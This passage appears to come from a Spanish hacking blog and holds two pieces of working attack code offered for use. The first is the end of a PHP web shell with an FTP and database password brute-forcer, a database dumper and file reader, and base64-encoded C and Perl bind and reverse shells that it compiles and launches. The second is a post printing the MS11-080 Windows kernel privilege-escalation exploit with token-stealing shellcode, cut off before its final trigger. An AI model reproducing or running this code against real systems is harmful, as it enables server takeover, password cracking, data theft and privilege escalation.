                        ++$attempts; 
                        if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { 
                            $success++; 
                            echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); 
                        } 
                    } 
                } 
        } elseif($_POST['type'] == 2) { 
            $temp = @file($_POST['dict']); 
            if( is_array($temp) ) 
                foreach($temp as $line) { 
                    $line = trim($line); 
                    ++$attempts; 
                    if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { 
                        $success++; 
                        echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; 
                    } 
                } 
        } 
        echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; 
    } 
    echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' 
        .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' 
        .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' 
        .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' 
        .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' 
        .'<span>Server:port</span></td>' 
        .'<td><input type=text name=server value="127.0.0.1"></td></tr>' 
        .'<tr><td><span>Brute type</span></td>' 
        .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' 
        .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' 
        .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' 
        .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' 
        .'<td><input type=text name=login value="komsen"></td></tr>' 
        .'<tr><td><span>Dictionary</span></td>' 
        .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' 
        .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; 
    echo '</div><br>'; 
    printFooter(); 
} 

function actionSql() { 
    class DbClass { 
        var $type; 
        var $link; 
        var $res; 
        function DbClass($type)    { 
            $this->type = $type; 
        } 
        function connect($host, $user, $pass, $dbname){ 
            switch($this->type)    { 
                case 'mysql': 
                    if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; 
                    break; 
                case 'pgsql': 
                    $host = explode(':', $host); 
                    if(!$host[1]) $host[1]=5432; 
                    if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; 
                    break; 
            } 
            return false; 
        } 
        function selectdb($db) { 
            switch($this->type)    { 
                case 'mysql': 
                    if (@mysql_select_db($db))return true; 
                    break; 
            } 
            return false; 
        } 
        function query($str) { 
            switch($this->type) { 
                case 'mysql': 
                    return $this->res = @mysql_query($str); 
                    break; 
                case 'pgsql': 
                    return $this->res = @pg_query($this->link,$str); 
                    break; 
            } 
            return false; 
        } 
        function fetch() { 
            $res = func_num_args()?func_get_arg(0):$this->res; 
            switch($this->type)    { 
                case 'mysql': 
                    return @mysql_fetch_assoc($res); 
                    break; 
                case 'pgsql': 
                    return @pg_fetch_assoc($res); 
                    break; 
            } 
            return false; 
        } 
        function listDbs() { 
            switch($this->type)    { 
                case 'mysql': 
                    return $this->res = @mysql_list_dbs($this->link); 
                break; 
                case 'pgsql': 
                    return $this->res = $this->query("SELECT datname FROM pg_database"); 
                break; 
            } 
            return false; 
        } 
        function listTables() { 
            switch($this->type)    { 
                case 'mysql': 
                    return $this->res = $this->query('SHOW TABLES'); 
                break; 
                case 'pgsql': 
                    return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'"); 
                break; 
            } 
            return false; 
        } 
        function error() { 
            switch($this->type)    { 
                case 'mysql': 
                    return @mysql_error($this->link); 
                break; 
                case 'pgsql': 
                    return @pg_last_error($this->link); 
                break; 
            } 
            return false; 
        } 
        function setCharset($str) { 
            switch($this->type)    { 
                case 'mysql': 
                    if(function_exists('mysql_set_charset')) 
                        return @mysql_set_charset($str, $this->link); 
                    else 
                        $this->query('SET CHARSET '.$str); 
                    break; 
                case 'mysql': 
                    return @pg_set_client_encoding($this->link, $str); 
                    break; 
            } 
            return false; 
        } 
        function dump($table) { 
            switch($this->type)    { 
                case 'mysql': 
                    $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); 
                    $create = mysql_fetch_array($res); 
                    echo $create[1].";\n\n"; 
                    $this->query('SELECT * FROM `'.$table.'`'); 
                    while($item = $this->fetch()) { 
                        $columns = array(); 
                        foreach($item as $k=>$v) { 
                            $item[$k] = "'".@mysql_real_escape_string($v)."'"; 
                            $columns[] = "`".$k."`"; 
                        } 
                    echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; 
                    } 
                break; 
                case 'pgsql': 
                    $this->query('SELECT * FROM '.$table); 
                    while($item = $this->fetch()) { 
                        $columns = array(); 
                        foreach($item as $k=>$v) { 
                            $item[$k] = "'".addslashes($v)."'"; 
                            $columns[] = $k; 
                        } 
                    echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; 
                    } 
                break; 
            } 
            return false; 
        } 
    }; 
    $db = new DbClass($_POST['type']); 
    if(@$_POST['p2']=='download') { 
        ob_start("ob_gzhandler", 4096); 
        $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); 
        $db->selectdb($_POST['sql_base']); 
        header("Content-Disposition: attachment; filename=dump.sql"); 
        header("Content-Type: text/plain"); 
        foreach($_POST['tbl'] as $v) 
                $db->dump($v); 
        exit; 
    } 
    printHeader(); 
    ?> 
    <h1>Sql browser</h1><div class=content> 
    <form name="sf" method="post"> 
        <table cellpadding="2" cellspacing="0"> 
            <tr> 
                <td>Type</td> 
                <td>Host</td> 
                <td>Login</td> 
                <td>Password</td> 
                <td>Database</td> 
                <td></td> 
            </tr> 
            <tr> 
                <input type=hidden name=a value=Sql> 
                <input type=hidden name=p1 value='query'> 
                <input type=hidden name=p2> 
                <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'> 
                <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> 
                <td> 
                    <select name='type'> 
                        <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option> 
                        <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option> 
                    </select></td> 
                <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td> 
                <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td> 
                <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td> 
                <td> 
    <?php 
    $tmp = "<input type=text name=sql_base value=''>"; 
    if(isset($_POST['sql_host'])){ 
        if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { 
            switch($_POST['charset']) { 
                case "Windows-1251": $db->setCharset('cp1251'); break; 
                case "UTF-8": $db->setCharset('utf8'); break; 
                case "KOI8-R": $db->setCharset('koi8r'); break; 
                case "KOI8-U": $db->setCharset('koi8u'); break; 
                case "cp866": $db->setCharset('cp866'); break; 
            } 
            $db->listDbs(); 
            echo "<select name=sql_base><option value=''></option>"; 
            while($item = $db->fetch()) { 
                list($key, $value) = each($item); 
                echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; 
            } 
            echo '</select>'; 
        } 
        else echo $tmp; 
    }else 
        echo $tmp; 
    ?></td> 
                <td><input type=submit value=">>"></td> 
            </tr> 
        </table> 
        <script> 
            function st(t,l) { 
                document.sf.p1.value = 'select'; 
                document.sf.p2.value = t; 
                if(l!=null)document.sf.p3.value = l; 
                document.sf.submit(); 
            } 
            function is() { 
                for(i=0;i<document.sf.elements['tbl[]'].length;++i) 
                    document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked; 
            } 
        </script> 
    <?php 
    if(isset($db) && $db->link){ 
        echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; 
            if(!empty($_POST['sql_base'])){ 
                $db->selectdb($_POST['sql_base']); 
                echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>"; 
                $tbls_res = $db->listTables(); 
                while($item = $db->fetch($tbls_res)) { 
                    list($key, $value) = each($item); 
                    $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); 
                    $value = htmlspecialchars($value); 
                    echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
                } 
                echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>"; 
                if(@$_POST['p1'] == 'select') { 
                    $_POST['p1'] = 'query'; 
                    $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].''); 
                    $num = $db->fetch(); 
                    $num = $num['n']; 
                    echo "<span>".$_POST['p2']."</span> ($num) "; 
                    for($i=0;$i<($num/30);$i++) 
                        if($i != (int)$_POST['p3']) 
                            echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> "; 
                        else 
                            echo ($i+1)," "; 
                    if($_POST['type']=='pgsql') 
                        $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); 
                    else 
                        $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; 
                    echo "<br><br>"; 
                } 
                if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) { 
                    $db->query(@$_POST['p3']); 
                    if($db->res !== false) { 
                        $title = false; 
                        echo '<table width=100% cellspacing=0 cellpadding=2 class=main>'; 
                        $line = 1; 
                        while($item = $db->fetch())    { 
                            if(!$title)    { 
                                echo '<tr>'; 
                                foreach($item as $key => $value) 
                                    echo '<th>'.$key.'</th>'; 
                                reset($item); 
                                $title=true; 
                                echo '</tr><tr>'; 
                                $line = 2; 
                            } 
                            echo '<tr class="l'.$line.'">'; 
                            $line = $line==1?2:1; 
                            foreach($item as $key => $value) { 
                                if($value == null) 
                                    echo '<td><i>null</i></td>'; 
                                else 
                                    echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; 
                            } 
                            echo '</tr>'; 
                        } 
                        echo '</table>'; 
                    } else { 
                        echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; 
                    } 
                } 
                echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>"; 
                echo "</td></tr>"; 
            } 
            echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; 
            if(@$_POST['p1'] == 'loadfile') { 
                $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file"); 
                $file = $db->fetch(); 
                echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
            } 
    } 
    echo '</div>'; 
    printFooter(); 
} 
function actionNetwork() { 
    printHeader(); 
    $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; 
    $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; 
    $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; 
    $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; 
    ?> 
    <h1>Network tools</h1><div class=content> 
    <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;"> 
    <span>Bind port to /bin/sh</span><br/> 
    Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>"> 
    </form> 
    <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;"> 
    <span>Back-connect to</span><br/> 
    Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>"> 
    </form><br> 
    <?php 
    if(isset($_POST['p1'])) { 
        function cf($f,$t) { 
            $w=@fopen($f,"w") or @function_exists('file_put_contents'); 
            if($w)    { 
                @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); 
                @fclose($w); 
            } 
        } 
        if($_POST['p1'] == 'bpc') { 
            cf("/tmp/bp.c",$bind_port_c); 
            $out = ex("gcc -o /tmp/bp /tmp/bp.c"); 
            @unlink("/tmp/bp.c"); 
            $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); 
            echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>"; 
        } 
        if($_POST['p1'] == 'bpp') { 
            cf("/tmp/bp.pl",$bind_port_p); 
            $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); 
            echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>"; 
        } 
        if($_POST['p1'] == 'bcc') { 
            cf("/tmp/bc.c",$back_connect_c); 
            $out = ex("gcc -o /tmp/bc /tmp/bc.c"); 
            @unlink("/tmp/bc.c"); 
            $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); 
            echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>"; 
        } 
        if($_POST['p1'] == 'bcp') { 
            cf("/tmp/bc.pl",$back_connect_p); 
            $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); 
            echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>"; 
        } 
    } 
    echo '</div>'; 
    printFooter(); 
} 
if( empty($_POST['a']) ) 
    if(isset($default_action) && function_exists('action' . $default_action)) 
        $_POST['a'] = $default_action; 
    else 
        $_POST['a'] = 'SecInfo'; 
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) 
    call_user_func('action' . $_POST['a']); 
?> 
<div id="cot_tl_fixed"><marquee>Shell - *Dr.Backd00r*  - SubhashDasyam.com</marquee></div> 
 </marquee></div>

Fuente: http://www.subhashdasyam.com/
[+] Salu2

Escalación de Privilegios en Windows (MS11-080 Afd.sys)

noreply@blogger.com (Zion3R) — Mon, 05 Dec 2011 17:44:55 PST

Este exploit (MS11-080 privilege escalation) se aprovecha del hecho de que afd.sys no valida correctamente user-mode que pasa al kernel-mode.

Ando muy corto de tiempo como para poner más detalles (~~es más, ni si quiera lo he probado :O~~), pero cualquier Privilege Escalation es importante hacerlo notar.

Espero conforme los días ir posteando más detalles y modo de uso.

Usage: MS11-080.py -O TARGET_OS

Options:
  -h, --help            show this help message and exit
  -O TARGET_OS, --target-os=TARGET_OS
                        Target OS. Accepted values: XP, 2K3

Les dejo el exploit (Python):

################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
#########         Author: ryujin@offsec.com - Matteo Memelli            ########
#########                      Spaghetti & Pwnsauce                     ########
#########              yuck! 0xbaadf00d Elwood@mac&cheese.com           ########
#########                                                               ########
#########      Thx to dookie(lifesaver)2000ca, dijital1 and ronin       ########
#########                        for helping out!                       ########
#########                                                               ########
#########                   To my Master Shifu muts:                    ########
#########           "So that's it, I just need inner peace?" ;)         ########
#########                                                               ########
#########        Exploit tested on the following 32bits systems:        ########
#########       Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng       ########
################################################################################
 
from ctypes import (windll, CDLL, Structure, byref, sizeof, POINTER,
                    c_char, c_short, c_ushort, c_int, c_uint, c_ulong,
                    c_void_p, c_long, c_char_p)
from ctypes.wintypes import HANDLE, DWORD
import socket, time, os, struct, sys
from optparse import OptionParser
 
usage =  "%prog -O TARGET_OS"
parser = OptionParser(usage=usage)
parser.add_option("-O", "--target-os", type="string",
                  action="store", dest="target_os",
                  help="Target OS. Accepted values: XP, 2K3")
(options, args) = parser.parse_args()
OS = options.target_os
if not OS or OS.upper() not in ['XP','2K3']:
   parser.print_help()
   sys.exit()
OS = OS.upper()
 
kernel32 = windll.kernel32
ntdll    = windll.ntdll
Psapi    = windll.Psapi
 
def findSysBase(drvname=None):
    ARRAY_SIZE            = 1024
    myarray               = c_ulong * ARRAY_SIZE 
    lpImageBase           = myarray() 
    cb                    = c_int(1024) 
    lpcbNeeded            = c_long() 
    drivername_size       = c_long() 
    drivername_size.value = 48
    Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded)) 
    for baseaddy in lpImageBase: 
        drivername = c_char_p("\x00"*drivername_size.value) 
        if baseaddy: 
            Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername, 
                            drivername_size.value)
            if drvname:
                if drivername.value.lower() == drvname:
                    print "[+] Retrieving %s info..." % drvname
                    print "[+] %s base address: %s" % (drvname, hex(baseaddy))
                    return baseaddy
            else:
                if drivername.value.lower().find("krnl") !=-1:
                    print "[+] Retrieving Kernel info..."
                    print "[+] Kernel version:", drivername.value
                    print "[+] Kernel base address: %s" % hex(baseaddy) 
                    return (baseaddy, drivername.value)
    return None
 
print "[>] MS11-080 Privilege Escalation Exploit"
print "[>] Matteo Memelli - ryujin@offsec.com"
print "[>] Release Date 28/11/2011"
 
WSAGetLastError          = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype  = c_int
SOCKET                   = c_int
WSASocket                = windll.Ws2_32.WSASocketA
WSASocket.argtypes       = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype        = SOCKET
closesocket              = windll.Ws2_32.closesocket
closesocket.argtypes     = (SOCKET,)
closesocket.restype      = c_int
connect                  = windll.Ws2_32.connect
connect.argtypes         = (SOCKET, c_void_p, c_int)
connect.restype          = c_int
 
class sockaddr_in(Structure):
    _fields_ = [
        ("sin_family", c_short),
        ("sin_port", c_ushort),
        ("sin_addr", c_ulong),
        ("sin_zero", c_char * 8),
        ]
 
## Create our deviceiocontrol socket handle
client = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP,
                   None, 0, 0)
if client == ~0:
    raise OSError, "WSASocket: %s" % (WSAGetLastError(),)
try:
    addr = sockaddr_in()
    addr.sin_family = socket.AF_INET
    addr.sin_port = socket.htons(4455)
    addr.sin_addr = socket.htonl(0x7f000001) # 127.0.0.1
    ## We need to connect to a closed port, socket state must be CONNECTING
    connect(client, byref(addr), sizeof(addr))
except:
    closesocket(client)
    raise
 
baseadd    = c_int(0x1001)
MEMRES     = (0x1000 | 0x2000)
PAGEEXE    = 0x00000040
Zerobits   = c_int(0)
RegionSize = c_int(0x1000)
written    = c_int(0)
## This will trigger the path to AfdRestartJoin
irpstuff   = ("\x41\x41\x41\x41\x42\x42\x42\x42"
              "\x00\x00\x00\x00\x44\x44\x44\x44"
              "\x01\x00\x00\x00"
              "\xe8\x00" + "4" + "\xf0\x00" + "\x45"*231)
## Allocate space for the input buffer
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
                                     byref(baseadd),
                                     0x0,
                                     byref(RegionSize),
                                     MEMRES,
                                     PAGEEXE)
# Copy input buffer to it
kernel32.WriteProcessMemory(-1, 0x1000, irpstuff, 0x100, byref(written))
startPage = c_int(0x00020000)
kernel32.VirtualProtect(startPage, 0x1000, PAGEEXE, byref(written))
################################# KERNEL INFO ##################################
lpDriver     = c_char_p()
lpPath       = c_char_p()
lpDrvAddress = c_long()
(krnlbase, kernelver) = findSysBase()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
HalDispatchTable = kernel32.GetProcAddress(hKernel, "HalDispatchTable")
HalDispatchTable -= hKernel
HalDispatchTable += krnlbase
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
halbase = findSysBase("hal.dll")
## WinXP SP3
if OS == "XP":
    HaliQuerySystemInformation = halbase+0x16bba # Offset for XPSP3
    HalpSetSystemInformation   = halbase+0x19436 # Offset for XPSP3
## Win2k3 SP2
else:
    HaliQuerySystemInformation = halbase+0x1fa1e # Offset for WIN2K3
    HalpSetSystemInformation   = halbase+0x21c60 # Offset for WIN2K3
print "[+] HaliQuerySystemInformation address:", hex(HaliQuerySystemInformation)
print "[+] HalpSetSystemInformation address:", hex(HalpSetSystemInformation)
 
################################# EXPLOITATION #################################
shellcode_address_dep   = 0x0002071e
shellcode_address_nodep = 0x000207b8
padding           = "\x90"*2
HalDispatchTable0x4 = HalDispatchTable + 0x4
HalDispatchTable0x8 = HalDispatchTable + 0x8
## tokenbkaddr      = 0x00020900
if OS == "XP":
    _KPROCESS = "\x44"
    _TOKEN    = "\xc8"
    _UPID     = "\x84"
    _APLINKS  = "\x88"
else:
    _KPROCESS = "\x38"
    _TOKEN    = "\xd8"
    _UPID     = "\x94"
    _APLINKS  = "\x98"
     
restore_ptrs =   "\x31\xc0" + \
                 "\xb8" + struct.pack("L", HalpSetSystemInformation) + \
                 "\xa3" + struct.pack("L", HalDispatchTable0x8) + \
                 "\xb8" + struct.pack("L", HaliQuerySystemInformation) + \
                 "\xa3" + struct.pack("L", HalDispatchTable0x4)
tokenstealing =  "\x52"                                 +\
                 "\x53"                                 +\
                 "\x33\xc0"                             +\
                 "\x64\x8b\x80\x24\x01\x00\x00"         +\
                 "\x8b\x40" + _KPROCESS                 +\
                 "\x8b\xc8"                             +\
                 "\x8b\x98" + _TOKEN + "\x00\x00\x00"   +\
                 "\x89\x1d\x00\x09\x02\x00"             +\
                 "\x8b\x80" + _APLINKS + "\x00\x00\x00" +\
                 "\x81\xe8" + _APLINKS + "\x00\x00\x00" +\
                 "\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\
                 "\x75\xe8"                             +\
                 "\x8b\x90" + _TOKEN + "\x00\x00\x00"   +\
                 "\x8b\xc1"                             +\
                 "\x89\x90" + _TOKEN + "\x00\x00\x00"   +\
                 "\x5b"                                 +\
                 "\x5a"                                 +\
                 "\xc2\x10"
restore_token =  "\x52"                                 +\
                 "\x33\xc0"                             +\
                 "\x64\x8b\x80\x24\x01\x00\x00"         +\
                 "\x8b\x40" + _KPROCESS                 +\
                 "\x8b\x15\x00\x09\x02\x00"             +\
                 "\x89\x90" + _TOKEN + "\x00\x00\x00"   +\
                 "\x5a"                                 +\
                 "\xc2\x10"
                  
shellcode         = padding + restore_ptrs + tokenstealing
shellcode_size    = len(shellcode)
orig_size         = shellcode_size
# Write shellcode in userspace (dep)
kernel32.WriteProcessMemory(-1, shellcode_address_dep, shellcode,
                                   shellcode_size, byref(written))
# Write shellcode in userspace *(nodep)
kernel32.WriteProcessMemory(-1, shellcode_address_nodep, shellcode,
                                   shellcode_size, byref(written))
## Trigger Pointer Overwrite
print "[*] Triggering AFDJoinLeaf pointer overwrite..."
IOCTL             = 0x000120bb                # AFDJoinLeaf
inputbuffer       = 0x1004
inputbuffer_size  = 0x108
outputbuffer_size = 0x0                       # Bypass Probe for Write
outputbuffer      = HalDispatchTable0x4 + 0x1 # HalDispatchTable+0x4+1
IoStatusBlock = c_ulong()
NTSTATUS = ntdll.ZwDeviceIoControlFile(client,
                                       None,
                                       None,
                                       None,
                                       byref(IoStatusBlock),
                                       IOCTL,
                                       inputbuffer,
                                       inputbuffer_size,
                                       outputbuffer,
                                       outputbuffer_size
                                       )
## Trigger shellcode
inp  = c_ulong()
